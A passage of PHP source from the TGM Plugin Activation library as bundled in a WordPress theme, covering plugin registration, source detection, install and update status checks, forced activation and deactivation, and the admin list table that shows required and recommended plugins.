				'name'               => '',      // String
				'slug'               => '',      // String
				'source'             => 'repo',  // String
				'required'           => false,   // Boolean
				'version'            => '',      // String
				'force_activation'   => false,   // Boolean
				'force_deactivation' => false,   // Boolean
				'external_url'       => '',      // String
				'is_callable'        => '',      // String|Array.
			);

			// Prepare the received data.
			$plugin = wp_parse_args( $plugin, $defaults );

			// Standardize the received slug.
			$plugin['slug'] = $this->sanitize_key( $plugin['slug'] );

			// Forgive users for using string versions of booleans or floats for version number.
			$plugin['version']            = (string) $plugin['version'];
			$plugin['source']             = empty( $plugin['source'] ) ? 'repo' : $plugin['source'];
			$plugin['required']           = TGMPA_Utils::validate_bool( $plugin['required'] );
			$plugin['force_activation']   = TGMPA_Utils::validate_bool( $plugin['force_activation'] );
			$plugin['force_deactivation'] = TGMPA_Utils::validate_bool( $plugin['force_deactivation'] );

			// Enrich the received data.
			$plugin['file_path']   = $this->_get_plugin_basename_from_slug( $plugin['slug'] );
			$plugin['source_type'] = $this->get_plugin_source_type( $plugin['source'] );

			// Set the class properties.
			$this->plugins[ $plugin['slug'] ]    = $plugin;
			$this->sort_order[ $plugin['slug'] ] = $plugin['name'];

			// Should we add the force activation hook ?
			if ( true === $plugin['force_activation'] ) {
				$this->has_forced_activation = true;
			}

			// Should we add the force deactivation hook ?
			if ( true === $plugin['force_deactivation'] ) {
				$this->has_forced_deactivation = true;
			}
		}

		/**
		 * Determine what type of source the plugin comes from.
		 *
		 * @since 2.5.0
		 *
		 * @param string $source The source of the plugin as provided, either empty (= WP repo), a file path
		 *                       (= bundled) or an external URL.
		 * @return string 'repo', 'external', or 'bundled'
		 */
		protected function get_plugin_source_type( $source ) {
			if ( 'repo' === $source || preg_match( self::WP_REPO_REGEX, $source ) ) {
				return 'repo';
			} elseif ( preg_match( self::IS_URL_REGEX, $source ) ) {
				return 'external';
			} else {
				return 'bundled';
			}
		}

		/**
		 * Sanitizes a string key.
		 *
		 * Near duplicate of WP Core `sanitize_key()`. The difference is that uppercase characters *are*
		 * allowed, so as not to break upgrade paths from non-standard bundled plugins using uppercase
		 * characters in the plugin directory path/slug. Silly them.
		 *
		 * @see https://developer.wordpress.org/reference/hooks/sanitize_key/
		 *
		 * @since 2.5.0
		 *
		 * @param string $key String key.
		 * @return string Sanitized key
		 */
		public function sanitize_key( $key ) {
			$raw_key = $key;
			$key     = preg_replace( '`[^A-Za-z0-9_-]`', '', $key );

			/**
			 * Filter a sanitized key string.
			 *
			 * @since 2.5.0
			 *
			 * @param string $key     Sanitized key.
			 * @param string $raw_key The key prior to sanitization.
			 */
			return apply_filters( 'tgmpa_sanitize_key', $key, $raw_key );
		}

		/**
		 * Amend default configuration settings.
		 *
		 * @since 2.0.0
		 *
		 * @param array $config Array of config options to pass as class properties.
		 */
		public function config( $config ) {
			$keys = array(
				'id',
				'default_path',
				'has_notices',
				'dismissable',
				'dismiss_msg',
				'menu',
				'parent_slug',
				'capability',
				'is_automatic',
				'message',
				'strings',
			);

			foreach ( $keys as $key ) {
				if ( isset( $config[ $key ] ) ) {
					if ( is_array( $config[ $key ] ) ) {
						$this->$key = array_merge( $this->$key, $config[ $key ] );
					} else {
						$this->$key = $config[ $key ];
					}
				}
			}
		}

		/**
		 * Amend action link after plugin installation.
		 *
		 * @since 2.0.0
		 *
		 * @param array $install_actions Existing array of actions.
		 * @return false|array Amended array of actions.
		 */
		public function actions( $install_actions ) {
			// Remove action links on the TGMPA install page.
			if ( $this->is_tgmpa_page() ) {
				return false;
			}

			return $install_actions;
		}

		/**
		 * Flushes the plugins cache on theme switch to prevent stale entries
		 * from remaining in the plugin table.
		 *
		 * @since 2.4.0
		 *
		 * @param bool $clear_update_cache Optional. Whether to clear the Plugin updates cache.
		 *                                 Parameter added in v2.5.0.
		 */
		public function flush_plugins_cache( $clear_update_cache = true ) {
			wp_clean_plugins_cache( $clear_update_cache );
		}

		/**
		 * Set file_path key for each installed plugin.
		 *
		 * @since 2.1.0
		 *
		 * @param string $plugin_slug Optional. If set, only (re-)populates the file path for that specific plugin.
		 *                            Parameter added in v2.5.0.
		 */
		public function populate_file_path( $plugin_slug = '' ) {
			if ( ! empty( $plugin_slug ) && is_string( $plugin_slug ) && isset( $this->plugins[ $plugin_slug ] ) ) {
				$this->plugins[ $plugin_slug ]['file_path'] = $this->_get_plugin_basename_from_slug( $plugin_slug );
			} else {
				// Add file_path key for all plugins.
				foreach ( $this->plugins as $slug => $values ) {
					$this->plugins[ $slug ]['file_path'] = $this->_get_plugin_basename_from_slug( $slug );
				}
			}
		}

		/**
		 * Helper function to extract the file path of the plugin file from the
		 * plugin slug, if the plugin is installed.
		 *
		 * @since 2.0.0
		 *
		 * @param string $slug Plugin slug (typically folder name) as provided by the developer.
		 * @return string Either file path for plugin if installed, or just the plugin slug.
		 */
		protected function _get_plugin_basename_from_slug( $slug ) {
			$keys = array_keys( $this->get_plugins() );

			foreach ( $keys as $key ) {
				if ( preg_match( '|^' . $slug . '/|', $key ) ) {
					return $key;
				}
			}

			return $slug;
		}

		/**
		 * Retrieve plugin data, given the plugin name.
		 *
		 * Loops through the registered plugins looking for $name. If it finds it,
		 * it returns the $data from that plugin. Otherwise, returns false.
		 *
		 * @since 2.1.0
		 *
		 * @param string $name Name of the plugin, as it was registered.
		 * @param string $data Optional. Array key of plugin data to return. Default is slug.
		 * @return string|boolean Plugin slug if found, false otherwise.
		 */
		public function _get_plugin_data_from_name( $name, $data = 'slug' ) {
			foreach ( $this->plugins as $values ) {
				if ( $name === $values['name'] && isset( $values[ $data ] ) ) {
					return $values[ $data ];
				}
			}

			return false;
		}

		/**
		 * Retrieve the download URL for a package.
		 *
		 * @since 2.5.0
		 *
		 * @param string $slug Plugin slug.
		 * @return string Plugin download URL or path to local file or empty string if undetermined.
		 */
		public function get_download_url( $slug ) {
			$dl_source = '';

			switch ( $this->plugins[ $slug ]['source_type'] ) {
				case 'repo':
					return $this->get_wp_repo_download_url( $slug );
				case 'external':
					return $this->plugins[ $slug ]['source'];
				case 'bundled':
					return $this->default_path . $this->plugins[ $slug ]['source'];
			}

			return $dl_source; // Should never happen.
		}

		/**
		 * Retrieve the download URL for a WP repo package.
		 *
		 * @since 2.5.0
		 *
		 * @param string $slug Plugin slug.
		 * @return string Plugin download URL.
		 */
		protected function get_wp_repo_download_url( $slug ) {
			$source = '';
			$api    = $this->get_plugins_api( $slug );

			if ( false !== $api && isset( $api->download_link ) ) {
				$source = $api->download_link;
			}

			return $source;
		}

		/**
		 * Try to grab information from WordPress API.
		 *
		 * @since 2.5.0
		 *
		 * @param string $slug Plugin slug.
		 * @return object Plugins_api response object on success, WP_Error on failure.
		 */
		protected function get_plugins_api( $slug ) {
			static $api = array(); // Cache received responses.

			if ( ! isset( $api[ $slug ] ) ) {
				if ( ! function_exists( 'plugins_api' ) ) {
					require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
				}

				$response = plugins_api( 'plugin_information', array( 'slug' => $slug, 'fields' => array( 'sections' => false ) ) );

				$api[ $slug ] = false;

				if ( is_wp_error( $response ) ) {
					wp_die( esc_html( $this->strings['oops'] ) );
				} else {
					$api[ $slug ] = $response;
				}
			}

			return $api[ $slug ];
		}

		/**
		 * Retrieve a link to a plugin information page.
		 *
		 * @since 2.5.0
		 *
		 * @param string $slug Plugin slug.
		 * @return string Fully formed html link to a plugin information page if available
		 *                or the plugin name if not.
		 */
		public function get_info_link( $slug ) {
			if ( ! empty( $this->plugins[ $slug ]['external_url'] ) && preg_match( self::IS_URL_REGEX, $this->plugins[ $slug ]['external_url'] ) ) {
				$link = sprintf(
					'<a href="%1$s" target="_blank">%2$s</a>',
					esc_url( $this->plugins[ $slug ]['external_url'] ),
					esc_html( $this->plugins[ $slug ]['name'] )
				);
			} elseif ( 'repo' === $this->plugins[ $slug ]['source_type'] ) {
				$url = add_query_arg(
					array(
						'tab'       => 'plugin-information',
						'plugin'    => urlencode( $slug ),
						'TB_iframe' => 'true',
						'width'     => '640',
						'height'    => '500',
					),
					self_admin_url( 'plugin-install.php' )
				);

				$link = sprintf(
					'<a href="%1$s" class="thickbox">%2$s</a>',
					esc_url( $url ),
					esc_html( $this->plugins[ $slug ]['name'] )
				);
			} else {
				$link = esc_html( $this->plugins[ $slug ]['name'] ); // No hyperlink.
			}

			return $link;
		}

		/**
		 * Determine if we're on the TGMPA Install page.
		 *
		 * @since 2.1.0
		 *
		 * @return boolean True when on the TGMPA page, false otherwise.
		 */
		protected function is_tgmpa_page() {
			return isset( $_GET['page'] ) && $this->menu === $_GET['page'];
		}

		/**
		 * Determine if we're on a WP Core installation/upgrade page.
		 *
		 * @since 2.6.0
		 *
		 * @return boolean True when on a WP Core installation/upgrade page, false otherwise.
		 */
		protected function is_core_update_page() {
			// Current screen is not always available, most notably on the customizer screen.
			if ( ! function_exists( 'get_current_screen' ) ) {
				return false;
			}

			$screen = get_current_screen();

			if ( 'update-core' === $screen->base ) {
				// Core update screen.
				return true;
			} elseif ( 'plugins' === $screen->base && ! empty( $_POST['action'] ) ) { // WPCS: CSRF ok.
				// Plugins bulk update screen.
				return true;
			} elseif ( 'update' === $screen->base && ! empty( $_POST['action'] ) ) { // WPCS: CSRF ok.
				// Individual updates (ajax call).
				return true;
			}

			return false;
		}

		/**
		 * Retrieve the URL to the TGMPA Install page.
		 *
		 * I.e. depending on the config settings passed something along the lines of:
		 * http://example.com/wp-admin/themes.php?page=tgmpa-install-plugins
		 *
		 * @since 2.5.0
		 *
		 * @return string Properly encoded URL (not escaped).
		 */
		public function get_tgmpa_url() {
			static $url;

			if ( ! isset( $url ) ) {
				$parent = $this->parent_slug;
				if ( false === strpos( $parent, '.php' ) ) {
					$parent = 'admin.php';
				}
				$url = add_query_arg(
					array(
						'page' => urlencode( $this->menu ),
					),
					self_admin_url( $parent )
				);
			}

			return $url;
		}

		/**
		 * Retrieve the URL to the TGMPA Install page for a specific plugin status (view).
		 *
		 * I.e. depending on the config settings passed something along the lines of:
		 * http://example.com/wp-admin/themes.php?page=tgmpa-install-plugins&plugin_status=install
		 *
		 * @since 2.5.0
		 *
		 * @param string $status Plugin status - either 'install', 'update' or 'activate'.
		 * @return string Properly encoded URL (not escaped).
		 */
		public function get_tgmpa_status_url( $status ) {
			return add_query_arg(
				array(
					'plugin_status' => urlencode( $status ),
				),
				$this->get_tgmpa_url()
			);
		}

		/**
		 * Determine whether there are open actions for plugins registered with TGMPA.
		 *
		 * @since 2.5.0
		 *
		 * @return bool True if complete, i.e. no outstanding actions. False otherwise.
		 */
		public function is_tgmpa_complete() {
			$complete = true;
			foreach ( $this->plugins as $slug => $plugin ) {
				if ( ! $this->is_plugin_active( $slug ) || false !== $this->does_plugin_have_update( $slug ) ) {
					$complete = false;
					break;
				}
			}

			return $complete;
		}

		/**
		 * Check if a plugin is installed. Does not take must-use plugins into account.
		 *
		 * @since 2.5.0
		 *
		 * @param string $slug Plugin slug.
		 * @return bool True if installed, false otherwise.
		 */
		public function is_plugin_installed( $slug ) {
			$installed_plugins = $this->get_plugins(); // Retrieve a list of all installed plugins (WP cached).

			return ( ! empty( $installed_plugins[ $this->plugins[ $slug ]['file_path'] ] ) );
		}

		/**
		 * Check if a plugin is active.
		 *
		 * @since 2.5.0
		 *
		 * @param string $slug Plugin slug.
		 * @return bool True if active, false otherwise.
		 */
		public function is_plugin_active( $slug ) {
			return ( ( ! empty( $this->plugins[ $slug ]['is_callable'] ) && is_callable( $this->plugins[ $slug ]['is_callable'] ) ) || is_plugin_active( $this->plugins[ $slug ]['file_path'] ) );
		}

		/**
		 * Check if a plugin can be updated, i.e. if we have information on the minimum WP version required
		 * available, check whether the current install meets them.
		 *
		 * @since 2.5.0
		 *
		 * @param string $slug Plugin slug.
		 * @return bool True if OK to update, false otherwise.
		 */
		public function can_plugin_update( $slug ) {
			// We currently can't get reliable info on non-WP-repo plugins - issue #380.
			if ( 'repo' !== $this->plugins[ $slug ]['source_type'] ) {
				return true;
			}

			$api = $this->get_plugins_api( $slug );

			if ( false !== $api && isset( $api->requires ) ) {
				return version_compare( $this->wp_version, $api->requires, '>=' );
			}

			// No usable info received from the plugins API, presume we can update.
			return true;
		}

		/**
		 * Check to see if the plugin is 'updatetable', i.e. installed, with an update available
		 * and no WP version requirements blocking it.
		 *
		 * @since 2.6.0
		 *
		 * @param string $slug Plugin slug.
		 * @return bool True if OK to proceed with update, false otherwise.
		 */
		public function is_plugin_updatetable( $slug ) {
			if ( ! $this->is_plugin_installed( $slug ) ) {
				return false;
			} else {
				return ( false !== $this->does_plugin_have_update( $slug ) && $this->can_plugin_update( $slug ) );
			}
		}

		/**
		 * Check if a plugin can be activated, i.e. is not currently active and meets the minimum
		 * plugin version requirements set in TGMPA (if any).
		 *
		 * @since 2.5.0
		 *
		 * @param string $slug Plugin slug.
		 * @return bool True if OK to activate, false otherwise.
		 */
		public function can_plugin_activate( $slug ) {
			return ( ! $this->is_plugin_active( $slug ) && ! $this->does_plugin_require_update( $slug ) );
		}

		/**
		 * Retrieve the version number of an installed plugin.
		 *
		 * @since 2.5.0
		 *
		 * @param string $slug Plugin slug.
		 * @return string Version number as string or an empty string if the plugin is not installed
		 *                or version unknown (plugins which don't comply with the plugin header standard).
		 */
		public function get_installed_version( $slug ) {
			$installed_plugins = $this->get_plugins(); // Retrieve a list of all installed plugins (WP cached).

			if ( ! empty( $installed_plugins[ $this->plugins[ $slug ]['file_path'] ]['Version'] ) ) {
				return $installed_plugins[ $this->plugins[ $slug ]['file_path'] ]['Version'];
			}

			return '';
		}

		/**
		 * Check whether a plugin complies with the minimum version requirements.
		 *
		 * @since 2.5.0
		 *
		 * @param string $slug Plugin slug.
		 * @return bool True when a plugin needs to be updated, otherwise false.
		 */
		public function does_plugin_require_update( $slug ) {
			$installed_version = $this->get_installed_version( $slug );
			$minimum_version   = $this->plugins[ $slug ]['version'];

			return version_compare( $minimum_version, $installed_version, '>' );
		}

		/**
		 * Check whether there is an update available for a plugin.
		 *
		 * @since 2.5.0
		 *
		 * @param string $slug Plugin slug.
		 * @return false|string Version number string of the available update or false if no update available.
		 */
		public function does_plugin_have_update( $slug ) {
			// Presume bundled and external plugins will point to a package which meets the minimum required version.
			if ( 'repo' !== $this->plugins[ $slug ]['source_type'] ) {
				if ( $this->does_plugin_require_update( $slug ) ) {
					return $this->plugins[ $slug ]['version'];
				}

				return false;
			}

			$repo_updates = get_site_transient( 'update_plugins' );

			if ( isset( $repo_updates->response[ $this->plugins[ $slug ]['file_path'] ]->new_version ) ) {
				return $repo_updates->response[ $this->plugins[ $slug ]['file_path'] ]->new_version;
			}

			return false;
		}

		/**
		 * Retrieve potential upgrade notice for a plugin.
		 *
		 * @since 2.5.0
		 *
		 * @param string $slug Plugin slug.
		 * @return string The upgrade notice or an empty string if no message was available or provided.
		 */
		public function get_upgrade_notice( $slug ) {
			// We currently can't get reliable info on non-WP-repo plugins - issue #380.
			if ( 'repo' !== $this->plugins[ $slug ]['source_type'] ) {
				return '';
			}

			$repo_updates = get_site_transient( 'update_plugins' );

			if ( ! empty( $repo_updates->response[ $this->plugins[ $slug ]['file_path'] ]->upgrade_notice ) ) {
				return $repo_updates->response[ $this->plugins[ $slug ]['file_path'] ]->upgrade_notice;
			}

			return '';
		}

		/**
		 * Wrapper around the core WP get_plugins function, making sure it's actually available.
		 *
		 * @since 2.5.0
		 *
		 * @param string $plugin_folder Optional. Relative path to single plugin folder.
		 * @return array Array of installed plugins with plugin information.
		 */
		public function get_plugins( $plugin_folder = '' ) {
			if ( ! function_exists( 'get_plugins' ) ) {
				require_once ABSPATH . 'wp-admin/includes/plugin.php';
			}

			return get_plugins( $plugin_folder );
		}

		/**
		 * Delete dismissable nag option when theme is switched.
		 *
		 * This ensures that the user(s) is/are again reminded via nag of required
		 * and/or recommended plugins if they re-activate the theme.
		 *
		 * @since 2.1.1
		 */
		public function update_dismiss() {
			delete_metadata( 'user', null, 'tgmpa_dismissed_notice_' . $this->id, null, true );
		}

		/**
		 * Forces plugin activation if the parameter 'force_activation' is
		 * set to true.
		 *
		 * This allows theme authors to specify certain plugins that must be
		 * active at all times while using the current theme.
		 *
		 * Please take special care when using this parameter as it has the
		 * potential to be harmful if not used correctly. Setting this parameter
		 * to true will not allow the specified plugin to be deactivated unless
		 * the user switches themes.
		 *
		 * @since 2.2.0
		 */
		public function force_activation() {
			foreach ( $this->plugins as $slug => $plugin ) {
				if ( true === $plugin['force_activation'] ) {
					if ( ! $this->is_plugin_installed( $slug ) ) {
						// Oops, plugin isn't there so iterate to next condition.
						continue;
					} elseif ( $this->can_plugin_activate( $slug ) ) {
						// There we go, activate the plugin.
						activate_plugin( $plugin['file_path'] );
					}
				}
			}
		}

		/**
		 * Forces plugin deactivation if the parameter 'force_deactivation'
		 * is set to true and adds the plugin to the 'recently active' plugins list.
		 *
		 * This allows theme authors to specify certain plugins that must be
		 * deactivated upon switching from the current theme to another.
		 *
		 * Please take special care when using this parameter as it has the
		 * potential to be harmful if not used correctly.
		 *
		 * @since 2.2.0
		 */
		public function force_deactivation() {
			$deactivated = array();

			foreach ( $this->plugins as $slug => $plugin ) {
				/*
				 * Only proceed forward if the parameter is set to true and plugin is active
				 * as a 'normal' (not must-use) plugin.
				 */
				if ( true === $plugin['force_deactivation'] && is_plugin_active( $plugin['file_path'] ) ) {
					deactivate_plugins( $plugin['file_path'] );
					$deactivated[ $plugin['file_path'] ] = time();
				}
			}

			if ( ! empty( $deactivated ) ) {
				update_option( 'recently_activated', $deactivated + (array) get_option( 'recently_activated' ) );
			}
		}

		/**
		 * Echo the current TGMPA version number to the page.
		 *
		 * @since 2.5.0
		 */
		public function show_tgmpa_version() {
			echo '<p style="float: right; padding: 0em 1.5em 0.5em 0;"><strong><small>',
				esc_html(
					sprintf(
						/* translators: %s: version number */
						__( 'TGMPA v%s', 'maxbizz' ),
						self::TGMPA_VERSION
					)
				),
				'</small></strong></p>';
		}

		/**
		 * Returns the singleton instance of the class.
		 *
		 * @since 2.4.0
		 *
		 * @return \TGM_Plugin_Activation The TGM_Plugin_Activation object.
		 */
		public static function get_instance() {
			if ( ! isset( self::$instance ) && ! ( self::$instance instanceof self ) ) {
				self::$instance = new self();
			}

			return self::$instance;
		}
	}

	if ( ! function_exists( 'load_tgm_plugin_activation' ) ) {
		/**
		 * Ensure only one instance of the class is ever invoked.
		 *
		 * @since 2.5.0
		 */
		function load_tgm_plugin_activation() {
			$GLOBALS['tgmpa'] = TGM_Plugin_Activation::get_instance();
		}
	}

	if ( did_action( 'plugins_loaded' ) ) {
		load_tgm_plugin_activation();
	} else {
		add_action( 'plugins_loaded', 'load_tgm_plugin_activation' );
	}
}

if ( ! function_exists( 'tgmpa' ) ) {
	/**
	 * Helper function to register a collection of required plugins.
	 *
	 * @since 2.0.0
	 * @api
	 *
	 * @param array $plugins An array of plugin arrays.
	 * @param array $config  Optional. An array of configuration values.
	 */
	function tgmpa( $plugins, $config = array() ) {
		$instance = call_user_func( array( get_class( $GLOBALS['tgmpa'] ), 'get_instance' ) );

		foreach ( $plugins as $plugin ) {
			call_user_func( array( $instance, 'register' ), $plugin );
		}

		if ( ! empty( $config ) && is_array( $config ) ) {
			// Send out notices for deprecated arguments passed.
			if ( isset( $config['notices'] ) ) {
				_deprecated_argument( __FUNCTION__, '2.2.0', 'The `notices` config parameter was renamed to `has_notices` in TGMPA 2.2.0. Please adjust your configuration.' );
				if ( ! isset( $config['has_notices'] ) ) {
					$config['has_notices'] = $config['notices'];
				}
			}

			if ( isset( $config['parent_menu_slug'] ) ) {
				_deprecated_argument( __FUNCTION__, '2.4.0', 'The `parent_menu_slug` config parameter was removed in TGMPA 2.4.0. In TGMPA 2.5.0 an alternative was (re-)introduced. Please adjust your configuration. For more information visit the website: http://tgmpluginactivation.com/configuration/#h-configuration-options.' );
			}
			if ( isset( $config['parent_url_slug'] ) ) {
				_deprecated_argument( __FUNCTION__, '2.4.0', 'The `parent_url_slug` config parameter was removed in TGMPA 2.4.0. In TGMPA 2.5.0 an alternative was (re-)introduced. Please adjust your configuration. For more information visit the website: http://tgmpluginactivation.com/configuration/#h-configuration-options.' );
			}

			call_user_func( array( $instance, 'config' ), $config );
		}
	}
}

/**
 * WP_List_Table isn't always available. If it isn't available,
 * we load it here.
 *
 * @since 2.2.0
 */
if ( ! class_exists( 'WP_List_Table' ) ) {
	require_once ABSPATH . 'wp-admin/includes/class-wp-list-table.php';
}

if ( ! class_exists( 'TGMPA_List_Table' ) ) {

	/**
	 * List table class for handling plugins.
	 *
	 * Extends the WP_List_Table class to provide a future-compatible
	 * way of listing out all required/recommended plugins.
	 *
	 * Gives users an interface similar to the Plugin Administration
	 * area with similar (albeit stripped down) capabilities.
	 *
	 * This class also allows for the bulk install of plugins.
	 *
	 * @since 2.2.0
	 *
	 * @package TGM-Plugin-Activation
	 * @author  Thomas Griffin
	 * @author  Gary Jones
	 */
	class TGMPA_List_Table extends WP_List_Table {
		/**
		 * TGMPA instance.
		 *
		 * @since 2.5.0
		 *
		 * @var object
		 */
		protected $tgmpa;

		/**
		 * The currently chosen view.
		 *
		 * @since 2.5.0
		 *
		 * @var string One of: 'all', 'install', 'update', 'activate'
		 */
		public $view_context = 'all';

		/**
		 * The plugin counts for the various views.
		 *
		 * @since 2.5.0
		 *
		 * @var array
		 */
		protected $view_totals = array(
			'all'      => 0,
			'install'  => 0,
			'update'   => 0,
			'activate' => 0,
		);

		/**
		 * References parent constructor and sets defaults for class.
		 *
		 * @since 2.2.0
		 */
		public function __construct() {
			$this->tgmpa = call_user_func( array( get_class( $GLOBALS['tgmpa'] ), 'get_instance' ) );

			parent::__construct(
				array(
					'singular' => 'plugin',
					'plural'   => 'plugins',
					'ajax'     => false,
				)
			);

			if ( isset( $_REQUEST['plugin_status'] ) && in_array( $_REQUEST['plugin_status'], array( 'install', 'update', 'activate' ), true ) ) {
				$this->view_context = sanitize_key( $_REQUEST['plugin_status'] );
			}

			add_filter( 'tgmpa_table_data_items', array( $this, 'sort_table_items' ) );
		}

		/**
		 * Get a list of CSS classes for the <table> tag.
		 *
		 * Overruled to prevent the 'plural' argument from being added.
		 *
		 * @since 2.5.0
		 *
		 * @return array CSS classnames.
		 */
		public function get_table_classes() {
			return array( 'widefat', 'fixed' );
		}

		/**
		 * Gathers and renames all of our plugin information to be used by WP_List_Table to create our table.
		 *
		 * @since 2.2.0
		 *
		 * @return array $table_data Information for use in table.
		 */
		protected function _gather_plugin_data() {
			// Load thickbox for plugin links.
			$this->tgmpa->admin_init();
			$this->tgmpa->thickbox();

			// Categorize the plugins which have open actions.
			$plugins = $this->categorize_plugins_to_views();

			// Set the counts for the view links.
			$this->set_view_totals( $plugins );

			// Prep variables for use and grab list of all installed plugins.
			$table_data = array();
			$i          = 0;

			// Redirect to the 'all' view if no plugins were found for the selected view context.
			if ( empty( $plugins[ $this->view_context ] ) ) {
				$this->view_context = 'all';
			}

			foreach ( $plugins[ $this->view_context ] as $slug => $plugin ) {
				$table_data[ $i ]['sanitized_plugin']  = $plugin['name'];
				$table_data[ $i ]['slug']              = $slug;
				$table_data[ $i ]['plugin']            = '<strong>' . $this->tgmpa->get_info_link( $slug ) . '</strong>';
				$table_data[ $i ]['source']            = $this->get_plugin_source_type_text( $plugin['source_type'] );
				$table_data[ $i ]['type']              = $this->get_plugin_advise_type_text( $plugin['required'] );
				$table_data[ $i ]['status']            = $this->get_plugin_status_text( $slug );
				$table_data[ $i ]['installed_version'] = $this->tgmpa->get_installed_version( $slug );
				$table_data[ $i ]['minimum_version']   = $plugin['version'];
				$table_data[ $i ]['available_version'] = $this->tgmpa->does_plugin_have_update( $slug );

				// Prep the upgrade notice info.
				$upgrade_notice = $this->tgmpa->get_upgrade_notice( $slug );
				if ( ! empty( $upgrade_notice ) ) {
					$table_data[ $i ]['upgrade_notice'] = $upgrade_notice;

					add_action( "tgmpa_after_plugin_row_{$slug}", array( $this, 'wp_plugin_update_row' ), 10, 2 );
				}

				$table_data[ $i ] = apply_filters( 'tgmpa_table_data_item', $table_data[ $i ], $plugin );

				$i++;
			}

			return $table_data;
		}

		/**
		 * Categorize the plugins which have open actions into views for the TGMPA page.
		 *
		 * @since 2.5.0
		 */
		protected function categorize_plugins_to_views() {
			$plugins = array(
				'all'      => array(), // Meaning: all plugins which still have open actions.
				'install'  => array(),
				'update'   => array(),
				'activate' => array(),
			);

			foreach ( $this->tgmpa->plugins as $slug => $plugin ) {
				if ( $this->tgmpa->is_plugin_active( $slug ) && false === $this->tgmpa->does_plugin_have_update( $slug ) ) {
					// No need to display plugins if they are installed, up-to-date and active.
					continue;
				} else {
					$plugins['all'][ $slug ] = $plugin;

					if ( ! $this->tgmpa->is_plugin_installed( $slug ) ) {
						$plugins['install'][ $slug ] = $plugin;
					} else {
						if ( false !== $this->tgmpa->does_plugin_have_update( $slug ) ) {
							$plugins['update'][ $slug ] = $plugin;
						}

						if ( $this->tgmpa->can_plugin_activate( $slug ) ) {
							$plugins['activate'][ $slug ] = $plugin;
						}
					}
				}
			}

			return $plugins;
		}

		/**
		 * Set the counts for the view links.
		 *
		 * @since 2.5.0
		 *
		 * @param array $plugins Plugins order by view.
		 */
		protected function set_view_totals( $plugins ) {
			foreach ( $plugins as $type => $list ) {
				$this->view_totals[ $type ] = count( $list );
			}
		}

		/**
		 * Get the plugin required/recommended text string.
		 *
		 * @since 2.5.0
		 *
		 * @param string $required Plugin required setting.
		 * @return string
		 */
		protected function get_plugin_advise_type_text( $required ) {
			if ( true === $required ) {
				return esc_html__( 'Required', 'maxbizz' );
			}

			return esc_html__( 'Recommended', 'maxbizz' );
		}

		/**
		 * Get the plugin source type text string.
		 *
		 * @since 2.5.0
		 *
		 * @param string $type Plugin type.
		 * @return string
		 */
		protected function get_plugin_source_type_text( $type ) {
			$string = '';

			switch ( $type ) {
				case 'repo':
					$string =esc_html__( 'WordPress Repository', 'maxbizz' );
					break;
				case 'external':
					$string =esc_html__( 'External Source', 'maxbizz' );
					break;
				case 'bundled':
					$string =esc_html__( 'Pre-Packaged', 'maxbizz' );
					break;
			}

			return $string;
		}

		/**
		 * Determine the plugin status message.
		 *
		 * @since 2.5.0
		 *
		 * @param string $slug Plugin slug.
		 * @return string
		 */
		protected function get_plugin_status_text( $slug ) {
			if ( ! $this->tgmpa->is_plugin_installed( $slug ) ) {
				return esc_html__( 'Not Installed', 'maxbizz' );
			}

			if ( ! $this->tgmpa->is_plugin_active( $slug ) ) {
				$install_status = esc_html__( 'Installed But Not Activated', 'maxbizz' );
			} else {
				$install_status = esc_html__( 'Active', 'maxbizz' );
			}

			$update_status = '';

			if ( $this->tgmpa->does_plugin_require_update( $slug ) && false === $this->tgmpa->does_plugin_have_update( $slug ) ) {
				$update_status = esc_html__( 'Required Update not Available', 'maxbizz' );

			} elseif ( $this->tgmpa->does_plugin_require_update( $slug ) ) {
				$update_status = esc_html__( 'Requires Update', 'maxbizz' );

			} elseif ( false !== $this->tgmpa->does_plugin_have_update( $slug ) ) {
				$update_status = esc_html__( 'Update recommended', 'maxbizz' );
			}

			if ( '' === $update_status ) {
				return $install_status;
			}

			return sprintf(
				/* translators: 1: install status, 2: update status */
				_x( '%1$s, %2$s', 'Install/Update Status', 'maxbizz' ),
				$install_status,
				$update_status
			);
		}

		/**
		 * Sort plugins by Required/Recommended type and by alphabetical plugin name within each type.
		 *
		 * @since 2.5.0
		 *
		 * @param array $items Prepared table items.
		 * @return array Sorted table items.
		 */
		public function sort_table_items( $items ) {
			$type = array();
			$name = array();

			foreach ( $items as $i => $plugin ) {
				$type[ $i ] = $plugin['type']; // Required / recommended.
				$name[ $i ] = $plugin['sanitized_plugin'];
			}

			array_multisort( $type, SORT_DESC, $name, SORT_ASC, $items );

			return $items;
		}

		/**
		 * Get an associative array ( id => link ) of the views available on this table.
		 *
		 * @since 2.5.0
		 *
		 * @return array
		 */
		public function get_views() {
			$status_links = array();

			foreach ( $this->view_totals as $type => $count ) {
				if ( $count < 1 ) {
					continue;
				}

				switch ( $type ) {
					case 'all':
						/* translators: 1: number of plugins. */
						$text = _nx( 'All <span class="count">(%s)</span>', 'All <span class="count">(%s)</span>', $count, 'plugins', 'maxbizz' );
						break;
					case 'install':
						/* translators: 1: number of plugins. */
						$text = _n( 'To Install <span class="count">(%s)</span>', 'To Install <span class="count">(%s)</span>', $count, 'maxbizz' );
						break;
					case 'update':
						/* translators: 1: number of plugins. */
						$text = _n( 'Update Available <span class="count">(%s)</span>', 'Update Available <span class="count">(%s)</span>', $count, 'maxbizz' );
						break;
					case 'activate':
						/* translators: 1: number of plugins. */
						$text = _n( 'To Activate <span class="count">(%s)</span>', 'To Activate <span class="count">(%s)</span>', $count, 'maxbizz' );
						break;
					default:
						$text = '';
						break;
				}

				if ( ! empty( $text ) ) {

					$status_links[ $type ] = sprintf(
						'<a href="%s"%s>%s</a>',
						esc_url( $this->tgmpa->get_tgmpa_status_url( $type ) ),
						( $type === $this->view_context ) ? ' class="current"' : '',
						sprintf( $text, number_format_i18n( $count ) )
					);
				}
			}

			return $status_links;
		}

		/**
		 * Create default columns to display important plugin information
		 * like type, action and status.
		 *
		 * @since 2.2.0
		 *
		 * @param array  $item        Array of item data.
		 * @param string $column_name The name of the column.
		 * @return string
		 */
		public function column_default( $item, $column_name ) {
			return $item[ $column_name ];
		}

		/**
		 * Required for bulk installing.
		 *
		 * Adds a checkbox for each plugin.
		 *
		 * @since 2.2.0
		 *
		 * @param array $item Array of item data.
		 * @return string The input checkbox with all necessary info.
		 */
		public function column_cb( $item ) {
			return sprintf(
				'<input type="checkbox" name="%1$s[]" value="%2$s" id="%3$s" />',
				esc_attr( $this->_args['singular'] ),
				esc_attr( $item['slug'] ),
				esc_attr( $item['sanitized_plugin'] )
			);
		}

		/**
